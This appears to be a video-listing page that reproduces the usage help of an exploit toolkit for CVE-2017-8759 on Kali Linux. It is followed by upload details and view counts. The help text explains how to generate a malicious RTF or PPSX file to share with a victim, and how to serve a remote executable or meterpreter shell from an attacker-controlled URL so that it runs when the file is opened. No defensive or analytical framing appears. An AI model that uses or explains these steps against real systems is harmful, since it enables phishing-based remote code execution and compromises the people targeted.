CVE-2017-8759 RCE
CVE-2017-8759 RCE Kali Linux 2017
Modes:
-M gen Generate M4licious file only
Generate m4licious RTF/PPSX file:
-w [ Filename.rtf ] Name of m4licious RTF file (Share this file with victim).
-u [ http://address.com/test.txt ] Path of remote txt file. Normally, this should be a domain or IP where this tool is running.
For example, http://YOURIP.com/test.txt (This URL will be included in m4licious RTF file and will be requested once victim will open m4licious RTF file.
-M exp Start exploitation mode
Expl0itation:
-p TCP port:Default 80 Local port number.
-e [ http://address.com/name.exe ] The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l [ /tmp/name.exe ] Specify local path of an executable file / meterpreter shell / payload.
kali linux
kali root
Watch video CVE-2017-8759 Kali Linux online without registration, duration hours minute second in high quality. This video was added by user Gamex Now 18 September 2017, don't forget to share it with your friends and acquaintances, it has been viewed on our site 12,959 once and liked it 173 people.